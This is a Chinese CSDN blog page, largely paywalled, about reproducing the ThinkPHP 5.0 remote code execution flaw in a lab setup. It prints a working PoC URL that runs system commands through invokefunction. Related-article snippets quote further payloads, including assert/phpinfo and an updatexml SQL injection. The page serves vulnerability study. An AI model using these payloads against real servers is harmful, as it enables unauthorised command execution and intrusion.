ThinkPhP 5.0 远程代码执行复现

最新推荐文章于 2022-10-14 18:59:59 发布
最新推荐文章于 2022-10-14 18:59:59 发布
阅读量305 收藏
点赞数
分类专栏: thinkphp 复现 搭建 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AKM4180/article/details/116102952
版权
本文详细介绍了如何复现ThinkPHP 5.0版本的一个严重安全漏洞,通过提供靶机环境配置步骤及利用Poc测试代码,展示了如何执行系统命令如`whoami`以及写入shell,同时提到了其他可能的攻击方式,如获取phpinfo和数据库用户名。
摘要由CSDN通过智能技术生成

ThinkPhP 5.0 远程代码执行复现

靶机: 192.168.249.129
攻击者: 192.168.0.130

一.靶机搭建环境
使用小皮集成环境(Apache 2.4.39+PHP 7.43)
1.1将think PHP下载包解压放入根目录;
下载地址:http://www.thinkphp.cn/donate/download/id/1156.html 在这里插入图片描述
1.2 访问靶机环境 :http://192.168.249.129/public/
在这里插入图片描述
二 上Poc进行测试。
whoami查看用户:
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

最低0.47元/天 解锁文章
探索宇宙真理.
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
php _get漏洞,thinkphp代码执行getshell的漏洞解决
weixin_42301367的博客
03-18 2473
先来简单说说前天thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell影响的范围:5.x < 5.1.31, <= 5.0.23漏洞危害: 导致系统被提权(你懂的)先来讲下,5.0 跟5.1的区别吧,tp5.1中引入了容器(Container)和门面(Facade)这两个新的类 tp5.0是没有这两个新的类的,漏洞原理URL:ht...
ThinkPHP 5命令执行漏洞复现
Atkx's Blog
02-09 732
漏洞简介 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,受影响的版本包括5.0和5.1版本,推荐尽快更新到最新版本。 漏洞描述 Thinphp团队在实现框架中的核心类Requests的method方法实现了表单请求类型伪装,默认为$_POST[‘_method’]变量,却没有对$_POST[‘_method’]属性进行严格校验,可以通过变
php 命令执行 漏洞,ThinkPHP 5.0命令执行漏洞分析及复现
weixin_35261213的博客
03-16 876
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。*本文作者:小纨绔,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。ThinkPHP 5.0 版本是一个颠覆和重构版本,也是ThinkPHP 十周年献礼版本,基于 PHP5.4 设计(完美支持 PHP7 ),采用全新的架构思想,引入了很多的 PHP 新特性,优化了核心,减少了...
【漏洞复现-thinkphp-命令执行】vulfocus/thinkphp-3.2.x
最新发布
10-14 2158
thinkphp-命令执行】日志包含
linux最新漏洞thinkphp,thinkphp5.0.x最新命令执行漏洞复现及扫描脚本编写
weixin_36473855的博客
05-16 2391
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?漏洞复现2019.1.11日,thinkphp官方再次公布了一个tp5代码执行漏洞影响范围:5.0.x ~ 5.0.23漏洞代码详情参考:https://blog.csdn.net/qq_29647709/article/details/86307859提示:经过测试5.0.0-5.0.20版本使用的payload与5....
ThinkPHP5 远程代码执行
LYJ20010728的博客
08-16 2415
这里写目录标题漏洞概要初始配置漏洞利用漏洞分析漏洞修复攻击总结 漏洞概要 本次漏洞存在于 ThinkPHP 底层没有对控制器名进行很好的合法性校验,导致在未开启强制路由的情况下,用户可以调用任意类的任意方法,最终导致远程代码执行漏洞的产生 漏洞影响版本: 5.0.7<=ThinkPHP5<=5.0.22 、5.1.0<=ThinkPHP<=5.1.30 初始配置 获取测试环境代码 composer create-project --prefer-dist topthink
ThinkPHP 5.0 完全开发手册 chm格式
05-26
ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。遵循Apache2开源许可协议发布,意味着你可以免费使用ThinkPHP,甚至允许把你基于ThinkPHP开发的应用开源或商业...
thinkphp5.0项目代码
03-30
ThinkPHP5.0中,数据库操作通过ORM(Object-Relational Mapping)完成,可以方便地执行SQL语句,进行数据的增删改查。同时,框架还提供了事务处理、模型关联等功能,增强了数据库操作的灵活性和安全性。 五、路由...
thinkphp5.0开发手册
01-25
thinkphp5.0开发手册...........................................................................................................................................................
ThinkPHP v5.0.9 核心版
11-30
ThinkPHP是一个开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,
ThinkPHP5.0完全开发手册.pdf
03-24
ThinkPHP5.0完全开发手册PDF版,骗子勿扰。2017年9月更新。
thinkphp5.0完全开发手册(pdf)
12-22
thinkphp5.0完全开发手册
thinkPHP5.0框架安装教程
10-20
本文将详细介绍如何安装thinkPHP5.0框架,包括安装环境的要求、常见的安装方法以及一些注意事项,帮助开发者顺利搭建开发环境。 首先,thinkPHP5.0框架对PHP环境有一定的要求,至少需要PHP 5.4.0及以上版本。此外,...
ThinkPHP5.0完全开发手册
04-21
ThinkPHP5.0完全开发手册;严格来说, ThinkPHP无需安装过程, 这里所说的安装其实就是把ThinkPHP框架放入WEB运行环境(前提是你的WEB运行环境已经OK),可以通过两种方式获取和安装ThinkPHP
thinkphp+mysql校园篮球比赛网站vue+elementui
qq840612233的博客
09-08 1863
在赛事预约管理页面中可以查看索引,赛事编号,赛事名称,项目分类,比赛模式,比赛地点,比赛时间,用户账号,用户姓名,性别,年龄,身高,体重,用户,预约时间,备注,审核回复,审核状态,审核等内容,并进行详情,查看评论,修改和删除等操作;在赛事预约管理页面中可以查看索引,赛事编号,赛事名称,项目分类,比赛模式,比赛地点,比赛时间,用户账号,用户姓名,性别,年龄,身高,体重,用户,预约时间,备注,审核回复,审核状态等内容,并进行详情,删除等操作;前端技术:nodejs+vue+elementui。
thinkphp5.0.9预处理导致的sql注入复现与详细分析
HBohan的博客
12-11 1031
复现 先搭建thinkphp5.0.9环境 配置下测试环境 然后访问 http://tptest.cc/index.php/index/index/getage?names[0,updatexml(0,concat(0xa,user()),0)]=1 复现成功 【点击获取学习资料】 渗透工具 技术文档、书籍 最新大厂面试题目及答案 视频教程 应急响应笔记 学习思路构图等等 漏洞分析 先看看传进来了什么 是一个关联数组 跟进where 跟进parseWhereExp
ThinkPHP 5.0.0-5.0.23 远程代码执行漏洞利用
weixin_30617797的博客
07-20 4219
漏洞影响范围: 5.0.0-5.0.23 官方已在5.0.24版本修复该漏洞。测试Payload: /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo() /index.php?s=inde...
thinkphp 5.x全版本任意代码执行
yuanfengfengyuan的博客
06-05 850
MSG ThinkPHP 5.x 版本中没有对路由中的控制器进行严格过滤,在存在admin、index模块、没有开启强制路由的条件下(默认不开启),导致可以注入恶意代码利用反射类调用命名空间其他任意内置类,从而被 GetShell。 POC 反斜杠解析成类造成命令执行 thinkphp 5.0.22 1、http://192.168.1.1/thinkphp/public/?s=.|think\...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值